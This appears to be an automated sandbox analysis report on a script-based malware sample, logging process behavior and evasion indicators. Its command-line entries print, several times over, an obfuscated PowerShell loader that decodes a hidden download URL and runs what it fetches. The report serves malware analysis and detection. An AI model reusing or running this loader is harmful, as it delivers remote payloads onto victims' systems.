              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5009Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4838Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6793Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2950Jump to behavior
              Source: C:\Windows\System32\wscript.exe TID: 5892Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1340Thread sleep time: -6456360425798339s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6092Thread sleep count: 6793 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1252Thread sleep time: -3689348814741908s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1056Thread sleep count: 2950 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: wscript.exe, 00000000.00000003.1272521798.000001BBF8142000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1264409533.000001BBF9FE3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1267175366.000001BBF9FE3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1263586854.000001BBF9FE3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1272148773.000001BBF9FE3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2559116933.000000000777F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: wscript.exe, 00000000.00000003.1263586854.000001BBF9FC1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1272148773.000001BBF9FC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1264409533.000001BBF9FC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1267175366.000001BBF9FC4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW)
              Source: powershell.exe, 0000000F.00000002.2642359454.000001FAE72FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0499D6F8 LdrInitializeThunk,19_2_0499D6F8

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: amsi64_8084.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8084, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3024, type: MEMORYSTR
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Woes.uds && echo t"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'stertors Styxian Hensigtserklringens Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur stertors Styxian Hensigtserklringens Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur';If (${host}.CurrentCulture) {$Saneringsplanernes++;}Function Isoelectric($Brnepsykologisk){$Bigamistens=$Brnepsykologisk.Length-$Saneringsplanernes;$Healthiest='SUBsTRI';$Healthiest+='ng';For( $candystick=2;$candystick -lt $Bigamistens;$candystick+=3){$stertors+=$Brnepsykologisk.$Healthiest.Invoke( $candystick, $Saneringsplanernes);}$stertors;}function Isoleringsmateriale($Portulakkernes){ . ($Chefkahyttens132) ($Portulakkernes);}$Koordinatfremstillingernes128=Isoelectric ' SMUno ,zLoiSll l a W/Op5 F.M 0Di Do( aW ,iSpn ,dPeoTrwR sPe ,rNMeTCl Fe1Su0l,.,o0Lu;.r bWReiManRe6no4 .;M .yxF.6Un4He;Sk .erS.vHe: n1La2M 1fo.Le0O )fr FGFeeE,cA,k JoS /Ko2P 0 ,1P 0Fa0R.1So0.o1Su LeFEqiIar ieGyfouoCaxPo/Ha1 o2K,1 ,.,u0en ';$Veloce=Isoelectric 'C.U,osSte irEn-M AN,g e tnc tWi ';$Forsmtes=Isoelectric 'IshNetTot .pBisS :No/Mo/MadF rSoiSmvRee S. Bgv.o ao HgErlT ebl.KrcTrod.mHj/NouBecUn?udeFoxmapfroUnr.rtm =,ud Co ,wU,nJ lFloLaaLidKn&.liGad,e=Un1S,D F8DinRek 3,tV eCyU TKSoaP W .BV,g.rwatlJeGNe5LarSelGaz Oj .mS.3Go5C,4OpPUdPDiMOpiVes ,RDeUV, ';$Lnslavers=Isoelectric ' r>Cu ';$Chefkahyttens132=Isoelectric 'AviBueMexBe ';$Ugerapporter5='Adviseringerne';$Pladret80 = Isoelectric ',ueTrcOvh JoBr Re%Eta ,pChpR dUna.rtOmafa%Ep\ eWdjo keDosFi. auIldOus R .i&Dr&,f ,deF.cSihtyoSt HutQu ';Isoleringsmateriale (Isoelectric 'Do$FogUnl .oFubkaa slBu:StS eRelS vBeeburRekQue n rdeveEwlMos nes,r bsBl= P(LecOvmD,dre Te/Emc,a Od$NePD,lS,a Dd .r eSpt,y8,n0Me),o ');Isoleringsmateriale (Isoelectric 'L.$BrglalAso IbF a .l.e: .NMiamivD lG,eO,rbu= a$JuFAfoSprKosPamIlt Me ssPh.ThsStp tl riKut,m(Bu$ CLGunU sKalSkaS,vS,eMerZ.s a) . ');Isoleringsmateriale (Isoelectric 'Af[SgN,aeStt.a.A.SMbeI.rF,vTuiLacGeeD.PTeolei Sn,utF.M raGen .aPog Lethr e]M.:.a:RaS te ,cFluDer Ki ,tPyy .P.lr Eo Rt .o ,cF o.kl S No=Mi En[ LNBeeA tI,. VSf eDec su CrIniG tLoyRePCorU.o.atBroHec So.ilBrT .y .p LeCl]Un:Ve:S TA,lStsRo1 o2Ba ');$Forsmtes=$Navler[0];$Rehypnotize= (Isoelectric 'Fo$MagA,l LoTjbBeaFjl,a: .SLayM l .lD o .gSpi ssSytMai AcD a ol,l=S.N ,e,hwUf-U OKobStjDreBrcSptUr CaS Ay,esAntO.e ,m O.flNM eBot,i.SoWi e.rbDiC,llGaiFee nInt');$Rehypnotize+=$Selverkendelsers[1];Isoleringsmateriale ($Rehypnotize);Isoleringsmateriale (Isoelectric ' K$PrS ,yA.l,ulSpoUbgFoi,psg t,ai ,c ra .l S.,iHQue .aGgd .e.ur PsKe[.y$.nVfee.ml Mov,Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Woes.uds && echo t"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'stertors styxian hensigtserklringens navler forsmtes brnesaarenes katte adviseringerne skidoo endomysium zymite indskudsstningers retarderet prostates afrejsendes setation hernandiaceae antefixa down linietegningens modstningen coarrangement ressentimentsflelser memoirelitteratur stertors styxian hensigtserklringens navler forsmtes brnesaarenes katte adviseringerne skidoo endomysium zymite indskudsstningers retarderet prostates afrejsendes setation hernandiaceae antefixa down linietegningens modstningen coarrangement ressentimentsflelser memoirelitteratur';if (${host}.currentculture) {$saneringsplanernes++;}function isoelectric($brnepsykologisk){$bigamistens=$brnepsykologisk.length-$saneringsplanernes;$healthiest='substri';$healthiest+='ng';for( $candystick=2;$candystick -lt $bigamistens;$candystick+=3){$stertors+=$brnepsykologisk.$healthiest.invoke( $candystick, $saneringsplanernes);}$stertors;}function isoleringsmateriale($portulakkernes){ . ($chefkahyttens132) ($portulakkernes);}$koordinatfremstillingernes128=isoelectric ' smuno ,zloisll l a w/op5 f.m 0di do( aw ,ispn ,dpeotrwr spe ,rnmetcl fe1su0l,.,o0lu;.r bwreimanre6no4 .;m .yxf.6un4he;sk .ers.vhe: n1la2m 1fo.le0o )fr fgfeee,ca,k jos /ko2p 0 ,1p 0fa0r.1so0.o1su lefeqiiar iegyfouocaxpo/ha1 o2k,1 ,.,u0en ';$veloce=isoelectric 'c.u,osste iren-m an,g e tnc twi ';$forsmtes=isoelectric 'ishnettot .pbiss :no/mo/madf rsoismvree s. bgv.o ao hgerlt ebl.krctrod.mhj/noubecun?udefoxmapfrounr.rtm =,ud co ,wu,nj lflolaalidkn&.ligad,e=un1s,d f8dinrek 3,tv ecyu tksoap w .bv,g.rwatljegne5larselgaz oj .ms.3go5c,4oppudpdimopives ,rdeuv, ';$lnslavers=isoelectric ' r>cu ';$chefkahyttens132=isoelectric 'avibuemexbe ';$ugerapporter5='adviseringerne';$pladret80 = isoelectric ',uetrcovh jobr re%eta ,pchpr duna.rtomafa%ep\ ewdjo kedosfi. auildous r .i&dr&,f ,def.csihtyost hutqu ';isoleringsmateriale (isoelectric 'do$fogunl .ofubkaa slbu:sts erels vbeeburrekque n rdeveewlmos nes,r bsbl= p(lecovmd,dre te/emc,a od$nepd,ls,a dd .r espt,y8,n0me),o ');isoleringsmateriale (isoelectric 'l.$brglalaso ibf a .l.e: .nmiamivd lg,eo,rbu= a$jufafosprkospamilt me ssph.thsstp tl rikut,m(bu$ clgunu skalskas,vs,emerz.s a) . ');isoleringsmateriale (isoelectric 'af[sgn,aestt.a.a.smbei.rf,vtuilacgeed.pteolei sn,utf.m ragen .apog lethr e]m.:.a:ras te ,cfluder ki ,tpyy .p.lr eo rt .o ,cf o.kl s no=mi en[ lnbeea ti,. vsf edec su crinig tloyrepcoru.o.atbrohec so.ilbrt .y .p lecl]un:ve:s ta,lstsro1 o2ba ');$forsmtes=$navler[0];$rehypnotize= (isoelectric 'fo$maga,l lotjbbeafjl,a: .slaym l .ld o .gspi sssytmai acd a ol,l=s.n ,e,hwuf-u okobstjdrebrcsptur cas ay,esanto.e ,m o.flnm ebot,i.sowi e.rbdic,llgaifee nint');$rehypnotize+=$selverkendelsers[1];isoleringsmateriale ($rehypnotize);isoleringsmateriale (isoelectric ' k$prs ,ya.l,ulspoubgfoi,psg t,ai ,c ra .l s.,ihque .aggd .e.ur pske[.y$.nvfee.ml mov,
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'stertors styxian hensigtserklringens navler forsmtes brnesaarenes katte adviseringerne skidoo endomysium zymite indskudsstningers retarderet prostates afrejsendes setation hernandiaceae antefixa down linietegningens modstningen coarrangement ressentimentsflelser memoirelitteratur stertors styxian hensigtserklringens navler forsmtes brnesaarenes katte adviseringerne skidoo endomysium zymite indskudsstningers retarderet prostates afrejsendes setation hernandiaceae antefixa down linietegningens modstningen coarrangement ressentimentsflelser memoirelitteratur';if (${host}.currentculture) {$saneringsplanernes++;}function isoelectric($brnepsykologisk){$bigamistens=$brnepsykologisk.length-$saneringsplanernes;$healthiest='substri';$healthiest+='ng';for( $candystick=2;$candystick -lt $bigamistens;$candystick+=3){$stertors+=$brnepsykologisk.$healthiest.invoke( $candystick, $saneringsplanernes);}$stertors;}function isoleringsmateriale($portulakkernes){ . ($chefkahyttens132) ($portulakkernes);}$koordinatfremstillingernes128=isoelectric ' smuno ,zloisll l a w/op5 f.m 0di do( aw ,ispn ,dpeotrwr spe ,rnmetcl fe1su0l,.,o0lu;.r bwreimanre6no4 .;m .yxf.6un4he;sk .ers.vhe: n1la2m 1fo.le0o )fr fgfeee,ca,k jos /ko2p 0 ,1p 0fa0r.1so0.o1su lefeqiiar iegyfouocaxpo/ha1 o2k,1 ,.,u0en ';$veloce=isoelectric 'c.u,osste iren-m an,g e tnc twi ';$forsmtes=isoelectric 'ishnettot .pbiss :no/mo/madf rsoismvree s. bgv.o ao hgerlt ebl.krctrod.mhj/noubecun?udefoxmapfrounr.rtm =,ud co ,wu,nj lflolaalidkn&.ligad,e=un1s,d f8dinrek 3,tv ecyu tksoap w .bv,g.rwatljegne5larselgaz oj .ms.3go5c,4oppudpdimopives ,rdeuv, ';$lnslavers=isoelectric ' r>cu ';$chefkahyttens132=isoelectric 'avibuemexbe ';$ugerapporter5='adviseringerne';$pladret80 = isoelectric ',uetrcovh jobr re%eta ,pchpr duna.rtomafa%ep\ ewdjo kedosfi. auildous r .i&dr&,f ,def.csihtyost hutqu ';isoleringsmateriale (isoelectric 'do$fogunl .ofubkaa slbu:sts erels vbeeburrekque n rdeveewlmos nes,r bsbl= p(lecovmd,dre te/emc,a od$nepd,ls,a dd .r espt,y8,n0me),o ');isoleringsmateriale (isoelectric 'l.$brglalaso ibf a .l.e: .nmiamivd lg,eo,rbu= a$jufafosprkospamilt me ssph.thsstp tl rikut,m(bu$ clgunu skalskas,vs,emerz.s a) . ');isoleringsmateriale (isoelectric 'af[sgn,aestt.a.a.smbei.rf,vtuilacgeed.pteolei sn,utf.m ragen .apog lethr e]m.:.a:ras te ,cfluder ki ,tpyy .p.lr eo rt .o ,cf o.kl s no=mi en[ lnbeea ti,. vsf edec su crinig tloyrepcoru.o.atbrohec so.ilbrt .y .p lecl]un:ve:s ta,lstsro1 o2ba ');$forsmtes=$navler[0];$rehypnotize= (isoelectric 'fo$maga,l lotjbbeafjl,a: .slaym l .ld o .gspi sssytmai acd a ol,l=s.n ,e,hwuf-u okobstjdrebrcsptur cas ay,esanto.e ,m o.flnm ebot,i.sowi e.rbdic,llgaifee nint');$rehypnotize+=$selverkendelsers[1];isoleringsmateriale ($rehypnotize);isoleringsmateriale (isoelectric ' k$prs ,ya.l,ulspoubgfoi,psg t,ai ,c ra .l s.,ihque .aggd .e.ur pske[.y$.nvfee.ml mov,
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'stertors styxian hensigtserklringens navler forsmtes brnesaarenes katte adviseringerne skidoo endomysium zymite indskudsstningers retarderet prostates afrejsendes setation hernandiaceae antefixa down linietegningens modstningen coarrangement ressentimentsflelser memoirelitteratur stertors styxian hensigtserklringens navler forsmtes brnesaarenes katte adviseringerne skidoo endomysium zymite indskudsstningers retarderet prostates afrejsendes setation hernandiaceae antefixa down linietegningens modstningen coarrangement ressentimentsflelser memoirelitteratur';if (${host}.currentculture) {$saneringsplanernes++;}function isoelectric($brnepsykologisk){$bigamistens=$brnepsykologisk.length-$saneringsplanernes;$healthiest='substri';$healthiest+='ng';for( $candystick=2;$candystick -lt $bigamistens;$candystick+=3){$stertors+=$brnepsykologisk.$healthiest.invoke( $candystick, $saneringsplanernes);}$stertors;}function isoleringsmateriale($portulakkernes){ . ($chefkahyttens132) ($portulakkernes);}$koordinatfremstillingernes128=isoelectric ' smuno ,zloisll l a w/op5 f.m 0di do( aw ,ispn ,dpeotrwr spe ,rnmetcl fe1su0l,.,o0lu;.r bwreimanre6no4 .;m .yxf.6un4he;sk .ers.vhe: n1la2m 1fo.le0o )fr fgfeee,ca,k jos /ko2p 0 ,1p 0fa0r.1so0.o1su lefeqiiar iegyfouocaxpo/ha1 o2k,1 ,.,u0en ';$veloce=isoelectric 'c.u,osste iren-m an,g e tnc twi ';$forsmtes=isoelectric 'ishnettot .pbiss :no/mo/madf rsoismvree s. bgv.o ao hgerlt ebl.krctrod.mhj/noubecun?udefoxmapfrounr.rtm =,ud co ,wu,nj lflolaalidkn&.ligad,e=un1s,d f8dinrek 3,tv ecyu tksoap w .bv,g.rwatljegne5larselgaz oj .ms.3go5c,4oppudpdimopives ,rdeuv, ';$lnslavers=isoelectric ' r>cu ';$chefkahyttens132=isoelectric 'avibuemexbe ';$ugerapporter5='adviseringerne';$pladret80 = isoelectric ',uetrcovh jobr re%eta ,pchpr duna.rtomafa%ep\ ewdjo kedosfi. auildous r .i&dr&,f ,def.csihtyost hutqu ';isoleringsmateriale (isoelectric 'do$fogunl .ofubkaa slbu:sts erels vbeeburrekque n rdeveewlmos nes,r bsbl= p(lecovmd,dre te/emc,a od$nepd,ls,a dd .r espt,y8,n0me),o ');isoleringsmateriale (isoelectric 'l.$brglalaso ibf a .l.e: .nmiamivd lg,eo,rbu= a$jufafosprkospamilt me ssph.thsstp tl rikut,m(bu$ clgunu skalskas,vs,emerz.s a) . ');isoleringsmateriale (isoelectric 'af[sgn,aestt.a.a.smbei.rf,vtuilacgeed.pteolei sn,utf.m ragen .apog lethr e]m.:.a:ras te ,cfluder ki ,tpyy .p.lr eo rt .o ,cf o.kl s no=mi en[ lnbeea ti,. vsf edec su crinig tloyrepcoru.o.atbrohec so.ilbrt .y .p lecl]un:ve:s ta,lstsro1 o2ba ');$forsmtes=$navler[0];$rehypnotize= (isoelectric 'fo$maga,l lotjbbeafjl,a: .slaym l .ld o .gspi sssytmai acd a ol,l=s.n ,e,hwuf-u okobstjdrebrcsptur cas ay,esanto.e ,m o.flnm ebot,i.sowi e.rbdic,llgaifee nint');$rehypnotize+=$selverkendelsers[1];isoleringsmateriale ($rehypnotize);isoleringsmateriale (isoelectric ' k$prs 